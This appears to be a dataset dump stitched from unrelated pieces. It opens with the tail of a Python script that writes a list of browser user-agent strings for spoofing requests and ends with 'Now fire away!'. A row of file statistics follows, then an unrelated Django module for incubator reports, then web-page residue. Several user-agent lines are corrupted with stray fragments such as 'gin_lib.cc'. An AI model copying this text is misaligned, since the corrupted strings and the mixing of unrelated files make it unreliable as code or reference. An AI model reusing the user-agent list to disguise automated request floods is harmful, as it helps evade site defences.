Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-gb) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7
Mozilla/5.0 (Windows; U; Windows NT 5.1; cs-CZ) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7
Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7
Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; da-dk) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; ja-jp) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/533.4+ (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; de-de) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; ja-jp) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; nl-nl) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7
Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B5097d Safari/6531.22.7
Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6531.22.7
Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 Safari/531.21.10gin_lib.cc
Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 Safari/531.21.10
Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 Safari/123
Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-TW) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Mozilla/5.0 (Windows; U; Windows NT 6.1; ko-KR) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE) AppleWebKit/532+ (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; hu-hu) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.21.11 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; ru-ru) AppleWebKit/533.2+ (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; de-at) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Mozilla/5.0 (iPhone; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10
Mozilla/5.0 (iPhone Simulator; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7D11 Safari/531.21.10
Mozilla/5.0 (iPad; U; CPU OS 3_2_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B500 Safari/53
Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; es-es) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B367 Safari/531.21.10
Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; es-es) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B360 Safari/531.21.10
Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.1021.10gin_lib.cc
Mozilla/5.0 (iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9
Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_8; en-us) AppleWebKit/532.0+ (KHTML, like Gecko) Version/4.0.3 Safari/531.9.2009
Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_8; en-us) AppleWebKit/532.0+ (KHTML, like Gecko) Version/4.0.3 Safari/531.9
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; nl-nl) AppleWebKit/532.3+ (KHTML, like Gecko) Version/4.0.3 Safari/531.9
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; fi-fi) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.3 Safari/531.21.10
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532+ (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1
Mozilla/5.0 (Windows; U; Windows NT 6.0; zh-TW) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1
Mozilla/5.0 (Windows; U; Windows NT 6.0; pl-PL) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1
Mozilla/5.0 (Windows; U; Windows NT 6.0; ja-JP) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1
Mozilla/5.0 (Windows; U; Windows NT 6.0; fr-FR) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1
Mozilla/5.0 (Windows; U; Windows NT 5.2; de-DE) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1
Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1
Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_7; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/531.2+ (KHTML, like Gecko) Version/4.0.1 Safari/530.18
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.1 Safari/530.18
Mozilla/5.0 (Windows; U; Windows NT 6.0; ru-RU) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16
Mozilla/5.0 (Windows; U; Windows NT 6.0; ja-JP) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16
Mozilla/5.0 (Windows; U; Windows NT 6.0; hu-HU) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16
Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16
Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528+ (KHTML, like Gecko) Version/4.0 Safari/528.16
Mozilla/5.0 (Windows; U; Windows NT 6.0; fr-FR) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16
Mozilla/5.0 (Windows; U; Windows NT 6.0; es-es) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16
Mozilla/5.0 (Windows; U; Windows NT 6.0; en) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16
Mozilla/5.0 (Windows; U; Windows NT 6.0; de-DE) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16
Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16
Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16
Mozilla/5.0 (Windows; U; Windows NT 5.1; sv-SE) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16
Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16
Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16
Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16
Mozilla/5.0 (Windows; U; Windows NT 5.1; nb-NO) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16
Mozilla/5.0 (Windows; U; Windows NT 5.1; hu-HU) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16
Mozilla/5.0 (Windows; U; Windows NT 5.1; fr-FR) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16
Mozilla/5.0 (Windows; U; Windows NT 5.1; fi-FI) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16
Opera/9.80 (Windows NT 6.0; U; en) Presto/2.8.99 Version/11.10
Opera/9.80 (Windows NT 5.1; U; zh-tw) Presto/2.8.131 Version/11.10
Opera/9.80 (X11; Linux x86_64; U; Ubuntu/10.10 (maverick); pl) Presto/2.7.62 Version/11.01
Opera/9.80 (X11; Linux i686; U; ja) Presto/2.7.62 Version/11.01
Opera/9.80 (X11; Linux i686; U; fr) Presto/2.7.62 Version/11.01
Opera/9.80 (Windows NT 6.1; U; zh-tw) Presto/2.7.62 Version/11.01
Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.7.62 Version/11.01
Opera/9.80 (Windows NT 6.1; U; sv) Presto/2.7.62 Version/11.01
Opera/9.80 (Windows NT 6.1; U; en-US) Presto/2.7.62 Version/11.01
Opera/9.80 (Windows NT 6.1; U; cs) Presto/2.7.62 Version/11.01
Opera/9.80 (Windows NT 6.0; U; pl) Presto/2.7.62 Version/11.01
Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.7.62 Version/11.01
Opera/9.80 (Windows NT 5.1; U;) Presto/2.7.62 Version/11.01
Opera/9.80 (Windows NT 5.1; U; cs) Presto/2.7.62 Version/11.01
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101213 Opera/9.80 (Windows NT 6.1; U; zh-tw) Presto/2.7.62 Version/11.01
Mozilla/5.0 (Windows NT 6.1; U; nl; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 11.01
Mozilla/5.0 (Windows NT 6.1; U; de; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 11.01
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; de) Opera 11.01
Opera/9.80 (X11; Linux x86_64; U; pl) Presto/2.7.62 Version/11.00
Opera/9.80 (X11; Linux i686; U; it) Presto/2.7.62 Version/11.00
Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.6.37 Version/11.00
Opera/9.80 (Windows NT 6.1; U; pl) Presto/2.7.62 Version/11.00
Opera/9.80 (Windows NT 6.1; U; ko) Presto/2.7.62 Version/11.00
Opera/9.80 (Windows NT 6.1; U; fi) Presto/2.7.62 Version/11.00
Opera/9.80 (Windows NT 6.1; U; en-GB) Presto/2.7.62 Version/11.00
Opera/9.80 (Windows NT 6.1 x64; U; en) Presto/2.7.62 Version/11.00
Opera/9.80 (Windows NT 6.0; U; en) Presto/2.7.39 Version/11.00
Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.39 Version/11.00
Opera/9.80 (Windows NT 5.1; U; MRA 5.5 (build 02842); ru) Presto/2.7.62 Version/11.00
Opera/9.80 (Windows NT 5.1; U; it) Presto/2.7.62 Version/11.00
Mozilla/5.0 (Windows NT 6.0; U; ja; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 11.00
Mozilla/5.0 (Windows NT 5.1; U; pl; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 11.00
Mozilla/5.0 (Windows NT 5.1; U; de; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 11.00
Mozilla/4.0 (compatible; MSIE 8.0; X11; Linux x86_64; pl) Opera 11.00
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; fr) Opera 11.00
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; ja) Opera 11.00
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; en) Opera 11.00
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; pl) Opera 11.00
Opera/9.80 (Windows NT 6.1; U; pl) Presto/2.6.31 Version/10.70
Mozilla/5.0 (Windows NT 5.2; U; ru; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.70
Mozilla/5.0 (Windows NT 5.1; U; zh-cn; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.70
Opera/9.80 (Windows NT 5.2; U; zh-cn) Presto/2.6.30 Version/10.63
Opera/9.80 (Windows NT 5.2; U; en) Presto/2.6.30 Version/10.63
Opera/9.80 (Windows NT 5.1; U; MRA 5.6 (build 03278); ru) Presto/2.6.30 Version/10.63
Opera/9.80 (Windows NT 5.1; U; pl) Presto/2.6.30 Version/10.62
Mozilla/5.0 (X11; Linux x86_64; U; de; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.62
Mozilla/4.0 (compatible; MSIE 8.0; X11; Linux x86_64; de) Opera 10.62
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; en) Opera 10.62
Opera/9.80 (X11; Linux i686; U; pl) Presto/2.6.30 Version/10.61
Opera/9.80 (X11; Linux i686; U; es-ES) Presto/2.6.30 Version/10.61
Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.6.30 Version/10.61
Opera/9.80 (Windows NT 6.1; U; en) Presto/2.6.30 Version/10.61
Opera/9.80 (Windows NT 6.0; U; it) Presto/2.6.30 Version/10.61
Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.6.30 Version/10.61
Opera/9.80 (Windows 98; U; de) Presto/2.6.30 Version/10.61
Opera/9.80 (Macintosh; Intel Mac OS X; U; nl) Presto/2.6.30 Version/10.61
Opera/9.80 (X11; Linux i686; U; en) Presto/2.5.27 Version/10.60
Opera/9.80 (Windows NT 6.0; U; nl) Presto/2.6.30 Version/10.60
Opera/10.60 (Windows NT 5.1; U; zh-cn) Presto/2.6.30 Version/10.60
Opera/10.60 (Windows NT 5.1; U; en-US) Presto/2.6.30 Version/10.60
Opera/9.80 (X11; Linux i686; U; it) Presto/2.5.24 Version/10.54
Opera/9.80 (X11; Linux i686; U; en-GB) Presto/2.5.24 Version/10.53
Mozilla/5.0 (Windows NT 5.1; U; zh-cn; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.53
Mozilla/5.0 (Windows NT 5.1; U; Firefox/5.0; en; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.53
Mozilla/5.0 (Windows NT 5.1; U; Firefox/4.5; en; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.53
Mozilla/5.0 (Windows NT 5.1; U; Firefox/3.5; en; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.53
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; ko) Opera 10.53
Opera/9.80 (Windows NT 6.1; U; fr) Presto/2.5.24 Version/10.52
Opera/9.80 (Windows NT 6.1; U; en) Presto/2.5.22 Version/10.51
Opera/9.80 (Windows NT 6.0; U; cs) Presto/2.5.22 Version/10.51
Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51
Opera/9.80 (Linux i686; U; en) Presto/2.5.22 Version/10.51
Mozilla/5.0 (Windows NT 6.1; U; en-GB; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.51
Mozilla/5.0 (Linux i686; U; en; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.51
Mozilla/4.0 (compatible; MSIE 8.0; Linux i686; en) Opera 10.51
Opera/9.80 (Windows NT 6.1; U; zh-tw) Presto/2.5.22 Version/10.50
Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.5.22 Version/10.50
Opera/9.80 (Windows NT 6.1; U; sk) Presto/2.6.22 Version/10.50
Opera/9.80 (Windows NT 6.1; U; ja) Presto/2.5.22 Version/10.50
Opera/9.80 (Windows NT 6.0; U; zh-cn) Presto/2.5.22 Version/10.50
Opera/9.80 (Windows NT 5.1; U; sk) Presto/2.5.22 Version/10.50
Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.22 Version/10.50
Opera/10.50 (Windows NT 6.1; U; en-GB) Presto/2.2.2
Opera/9.80 (S60; SymbOS; Opera Tablet/9174; U; en) Presto/2.7.81 Version/10.5
Opera/9.80 (X11; U; Linux i686; en-US; rv:1.9.2.3) Presto/2.2.15 Version/10.10
Opera/9.80 (X11; Linux x86_64; U; it) Presto/2.2.15 Version/10.10
Opera/9.80 (Windows NT 6.1; U; de) Presto/2.2.15 Version/10.10
Opera/9.80 (Windows NT 6.0; U; Gecko/20100115; pl) Presto/2.2.15 Version/10.10
Opera/9.80 (Windows NT 6.0; U; en) Presto/2.2.15 Version/10.10
Opera/9.80 (Windows NT 5.1; U; de) Presto/2.2.15 Version/10.10
Opera/9.80 (Windows NT 5.1; U; cs) Presto/2.2.15 Version/10.10
Mozilla/5.0 (Windows NT 6.0; U; tr; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 10.10
Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686; de) Opera 10.10
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.0; tr) Opera 10.10
Opera/9.80 (X11; Linux x86_64; U; en-GB) Presto/2.2.15 Version/10.01
Opera/9.80 (X11; Linux x86_64; U; en) Presto/2.2.15 Version/10.00
Opera/9.80 (X11; Linux x86_64; U; de) Presto/2.2.15 Version/10.00
Opera/9.80 (X11; Linux i686; U; ru) Presto/2.2.15 Version/10.00
Opera/9.80 (X11; Linux i686; U; pt-BR) Presto/2.2.15 Version/10.00
Opera/9.80 (X11; Linux i686; U; pl) Presto/2.2.15 Version/10.00
Opera/9.80 (X11; Linux i686; U; nb) Presto/2.2.15 Version/10.00
Opera/9.80 (X11; Linux i686; U; en-GB) Presto/2.2.15 Version/10.00
Opera/9.80 (X11; Linux i686; U; en) Presto/2.2.15 Version/10.00
Opera/9.80 (X11; Linux i686; U; Debian; pl) Presto/2.2.15 Version/10.00
Opera/9.80 (X11; Linux i686; U; de) Presto/2.2.15 Version/10.00
Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.2.15 Version/10.00
Opera/9.80 (Windows NT 6.1; U; fi) Presto/2.2.15 Version/10.00
Opera/9.80 (Windows NT 6.1; U; en) Presto/2.2.15 Version/10.00
Opera/9.80 (Windows NT 6.1; U; de) Presto/2.2.15 Version/10.00
Opera/9.80 (Windows NT 6.1; U; cs) Presto/2.2.15 Version/10.00
Opera/9.80 (Windows NT 6.0; U; en) Presto/2.2.15 Version/10.00
Opera/9.80 (Windows NT 6.0; U; de) Presto/2.2.15 Version/10.00
Opera/9.80 (Windows NT 5.2; U; en) Presto/2.2.15 Version/10.00
Opera/9.80 (Windows NT 5.1; U; zh-cn) Presto/2.2.15 Version/10.00
Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.2.15 Version/10.00
""")
FILE.close()
print (''+G+'[*] ' + color.UNDERLINE + ''+W+'Done generating! Now fire away!' + color.END) | 93.673832 | 227 | 0.693618 | 22,258 | 100,231 | 3.108231 | 0.03392 | 0.025555 | 0.10173 | 0.088114 | 0.925184 | 0.919156 | 0.90661 | 0.891997 | 0.876935 | 0.85667 | 0 | 0.232401 | 0.118736 | 100,231 | 1,070 | 228 | 93.673832 | 0.550832 | 0.009688 | 0 | 0.026846 | 0 | 0.861937 | 0.983603 | 0.016256 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.003835 | 0.010547 | null | null | 0.022052 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
96578e03be5f8334aeb67d720dac9a8185a9fd75 | 4,003 | py | Python | bis/apps/incubator/views/customReports.py | AgustinMachiavello/business-incubation-system | 983e1308697771570891568f99d1b8ba74441d32 | [
"MIT"
] | 2 | 2021-03-03T16:16:42.000Z | 2021-03-08T22:43:10.000Z | bis/apps/incubator/views/customReports.py | AgustinMachiavello/business-incubation-system | 983e1308697771570891568f99d1b8ba74441d32 | [
"MIT"
] | null | null | null | bis/apps/incubator/views/customReports.py | AgustinMachiavello/business-incubation-system | 983e1308697771570891568f99d1b8ba74441d32 | [
"MIT"
] | null | null | null | """
Custom reports
"""
# Django
from django.db.models import Count
# Models
from ..models import *
# Helpers
from ..helpers import queryFilters, helperDictionaries
def entrepreneursIncubated(dateFrom=None, dateTo=None):
    """
    Build the report payload for entrepreneurs whose projects reached
    the incubation stage (Stage.stage_type == "IN").

    Returns a dict with:
        queryset    -- Entrepreneur queryset for the matching projects
        fields      -- report field names (keys of the field dictionary)
        values      -- placeholder, always empty here
        fieldLabels -- human-readable labels (values of the field dictionary)
        fieldDict   -- the raw field-name -> label mapping

    NOTE(review): dateFrom/dateTo are accepted but never used — confirm
    whether date-range filtering was intended.
    """
    # Stages of type "IN" identify incubated projects.  # check for duplicated
    incubation_stages = Stage.objects.filter(stage_type="IN")
    incubated_projects = Project.objects.filter(
        id__in=incubation_stages.values('project_id')
    )
    matching_entrepreneurs = Entrepreneur.objects.filter(
        id__in=incubated_projects.values('entrepreneurs')
    )

    field_mapping = helperDictionaries.getModelReportFields('entrepreneurs')

    # Key order mirrors the original payload construction.
    return {
        'queryset': matching_entrepreneurs,
        'fields': list(field_mapping.keys()),
        'values': [],
        'fieldLabels': list(field_mapping.values()),
        'fieldDict': field_mapping,
    }
def entrepreneursSex(dateFrom=None, dateTo=None):
    """
    Build the report payload for entrepreneurs attached to incubated
    projects (Stage.stage_type == "IN").

    The body is identical to entrepreneursIncubated; only the report
    name differs at the call site.

    Returns a dict with keys: queryset, fields, values, fieldLabels,
    fieldDict (see entrepreneursIncubated for their meaning).

    NOTE(review): dateFrom/dateTo are accepted but never used — confirm
    whether date-range filtering was intended.
    """
    # Restrict to incubation stages.  # check for duplicated
    stages_in = Stage.objects.filter(stage_type="IN")
    related_projects = Project.objects.filter(
        id__in=stages_in.values('project_id')
    )
    related_entrepreneurs = Entrepreneur.objects.filter(
        id__in=related_projects.values('entrepreneurs')
    )

    report_fields = helperDictionaries.getModelReportFields('entrepreneurs')

    # Same key order as the original incremental dict construction.
    return {
        'queryset': related_entrepreneurs,
        'fields': [*report_fields],
        'values': [],
        'fieldLabels': [*report_fields.values()],
        'fieldDict': report_fields,
    }
def projectsIncubated(dateFrom=None, dateTo=None):
    """
    Build the report payload for projects that reached the incubation
    stage (Stage.stage_type == "IN").

    Returns a dict with keys: queryset (Project queryset), fields,
    values (always empty), fieldLabels, and fieldDict (the raw
    field-name -> label mapping).

    NOTE(review): dateFrom/dateTo are accepted but never used — confirm
    whether date-range filtering was intended.
    """
    # Projects are located through their "IN" stages.  # check for duplicated
    project_ids = Stage.objects.filter(stage_type="IN").values('project_id')
    incubated = Project.objects.filter(id__in=project_ids)

    labels_by_field = helperDictionaries.getModelReportFields('projects')

    # Preserve the key order of the original payload.
    return {
        'queryset': incubated,
        'fields': list(labels_by_field),
        'values': [],
        'fieldLabels': list(labels_by_field.values()),
        'fieldDict': labels_by_field,
    }
def projectsPreincubated(dateFrom=None, dateTo=None):
    """
    Return the report payload for projects in the PRE-incubation stage
    (Stage.stage_type == "PI").

    Fix: the previous docstring was copy-pasted from projectsIncubated
    and wrongly described this report as "projects incubated".

    Returns a dict with:
        queryset    -- Project queryset for projects with a "PI" stage
        fields      -- report field names (keys of the field dictionary)
        values      -- placeholder, always empty here
        fieldLabels -- human-readable labels (values of the field dictionary)
        fieldDict   -- the raw field-name -> label mapping

    NOTE(review): dateFrom/dateTo are accepted but never used — confirm
    whether date-range filtering was intended.
    """
    queryset = Stage.objects
    output = {
        'queryset': None,
        'fields': [],
        'values': [],
        'fieldLabels': [],
    }
    # "PI" marks the pre-incubation stage.  # check for duplicated
    queryset = queryset.filter(stage_type="PI")
    projects = Project.objects.filter(id__in=queryset.values('project_id'))
    output['queryset'] = projects
    fieldsDict = helperDictionaries.getModelReportFields('projects')
    output['fieldDict'] = fieldsDict
    output['fields'] = [*fieldsDict.keys()]
    output['fieldLabels'] = [*fieldsDict.values()]
    return output
def projectsSecondSeed(dateFrom=None, dateTo=None):
    """
    Build the report payload for projects that received second-seed
    capital, identified by a Financing record with code_type == "A2".

    Returns a dict with keys: queryset (Project queryset), fields,
    values (always empty), fieldLabels, and fieldDict (the raw
    field-name -> label mapping).

    NOTE(review): dateFrom/dateTo are accepted but never used — confirm
    whether date-range filtering was intended.
    """
    # Second-seed financing rows point at the qualifying projects.  # check for duplicated
    second_seed_financing = Financing.objects.filter(code_type="A2")
    funded_projects = Project.objects.filter(
        id__in=second_seed_financing.values('project_id')
    )

    field_labels = helperDictionaries.getModelReportFields('projects')

    # Key order matches the original payload construction.
    return {
        'queryset': funded_projects,
        'fields': [*field_labels.keys()],
        'values': [],
        'fieldLabels': [*field_labels.values()],
        'fieldDict': field_labels,
    }
# Registry mapping a report slug (as received from the URL/form layer,
# presumably — verify against the caller) to the function that builds
# its report payload.
# NOTE(review): entrepreneursSex is defined above but not registered
# here — confirm whether that omission is intentional.
REPORTS_DICT = {
    'entrepreneurs_incubated': entrepreneursIncubated,
    'projects_incubated': projectsIncubated,
    'projects_preincubated': projectsPreincubated,
    'projects_second_seed': projectsSecondSeed,
}
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.